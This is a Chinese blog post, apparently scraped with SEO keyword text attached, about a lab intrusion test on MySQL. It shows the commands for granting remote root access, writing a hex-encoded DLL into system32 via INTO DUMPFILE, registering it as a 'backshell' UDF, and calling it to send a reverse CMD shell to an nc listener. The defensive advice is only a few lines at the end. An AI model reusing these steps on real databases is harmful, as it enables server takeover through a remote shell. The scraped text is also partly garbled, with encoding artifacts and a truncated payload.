南昌网站建设方式,国家反诈中心app下载安装,免费创建社区平台,备案的网站 ,能拿来做仿站吗bitsCN.com在做了之前的SQL SERVER之后#xff0c;便很想尝试一下MYSQL的入侵测试已经防范#xff0c;与大家一起分享。总的来说#xff0c;我一直在用的是MYSQL#xff0c;对MYSQL比较熟悉#xff0c;相比较而言#xff0c;感觉MYSQL更安全#xff0c;这只是我自己胡乱…bitsCN.com在做了之前的SQL SERVER之后便很想尝试一下MYSQL的入侵测试已经防范与大家一起分享。总的来说我一直在用的是MYSQL对MYSQL比较熟悉相比较而言感觉MYSQL更安全这只是我自己胡乱猜想的希望不要引起什么争论神马的。。。一本馒头引发的血案。。。正题之一物理机Win7虚拟机XP给予mysql远程权限grant all privileges on *.* to 数据库账号给予权限的IP identified by 数据库密码;flush privileges;给物理机远程权限物理机成功连接上执行侵入测试前(有图有真相)执行侵入测试后(有图有真相)重启前(有图有真相)重启后(有图有真相)正题之二远程登录之后写入代码代码在yyd.txt当中然后在MySql中写入文件Win7 打另外一个cmd本地端口映射nc -vv -l -p 端口号虚拟机上执行映射select backshell(物理机IP,端口号);这便执行了3306端口反弹CMD(没图了。。。用到了一个nc软件执行的映射)yyd.txt大概内容et aconcat(,0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代码...............0736875745f6465696e697400736875745f696e697400);create table yyd(data LONGBLOB);insert into yyd values();updateyyd set data a;select data from yyd into DUMPFILE c://windows//system32//yyd.dll;CREATE FUNCTION backshell RETURNS STRING SONAME yyd.dll;正题之三防范感觉有点乱主要是分享了两种方法入侵但是防范那部分应该是XP上的MySql服务关闭但是早XP上做了好多测试左后XP被我弄挂掉了。。。。好丢脸只好把Win7上的MySql服务拿出来了。觉得主要还是远程连接的问题“如果MySql不开启远程连接的话我们还是朋友”开玩笑如果MySql不开启远程连接的话入侵几率会小的很多。bitsCN.com相关标签神马本文原创发布php中文网转载请注明出处感谢您的尊重
